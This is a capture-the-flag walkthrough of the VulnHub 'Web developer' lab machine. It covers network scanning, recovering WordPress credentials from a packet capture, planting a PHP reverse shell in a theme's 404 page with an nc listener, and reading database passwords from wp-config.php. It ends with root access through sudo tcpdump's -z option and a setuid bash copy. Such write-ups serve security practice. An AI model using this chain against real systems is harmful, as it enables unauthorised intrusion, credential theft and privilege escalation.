Web developer : 1 Walkthrough (VulnHub) :-
Today we’ll be continuing with our new machine on VulnHub. In this article, we will see a walkthrough of an interesting VulnHub machine called Web developer.
here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.43.25
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.25
With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http .
open in browser http://192.168.43.25/
┌─[root@RDX]─[~]
└──╼ #nikto — url 192.168.43.25
┌─[✗]─[root@RDX]─[~]
└──╼ #dirb http://192.168.43.25
# open in browser http://192.168.43.25/ipdata
now i got a file analyze.cap
login = webdeveloper
“pwd” = “Te5eQg&4sBS!Yr$)wf%(DcAd”
On to the reverse shell now…
I had to switch to a different theme to bypass edit restrictions, I replaced the 404 error page with a php reverse shell, the listener on the host port 443 and I got the shell .
http://192.168.43.25/wp-content/themes/twentysixteen/404.php
┌─[root@RDX]─[~]
└──╼ #nc -nlvp 443
$ cd /var/www/html
$ ls
$ cat wp-config.php
/** MySQL database username */
define(‘DB_USER’, ‘webdeveloper’);
/** MySQL database password */
define(‘DB_PASSWORD’, ‘MasterOfTheUniverse’);
/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);
┌─[root@RDX]─[~]
└──╼ #ssh webdeveloper@192.168.43.25
Privilege Escalation
webdeveloper@webdeveloper:~$ sudo -l
Matching Defaults entries for webdeveloper on webdeveloper:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webdeveloper may run the following commands on webdeveloper:
(root) /usr/sbin/tcpdump
$ cd /tmp
$ touch bash
$ vim bash
cp /bin/bash /tmp/sh-1
chmod u+s /tmp/sh-1
$ chmod +x bash
$ sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/bash -Z root
sh-1–4.4$ ./sh-1 -p
sh-1–4.4# cd /root
sh-1–4.4# ls
flag.txt
sh-1–4.4# cat flag.txt
sh-1–4.4# id
Successfully got the root privilege and the ‘flag.txt’ .
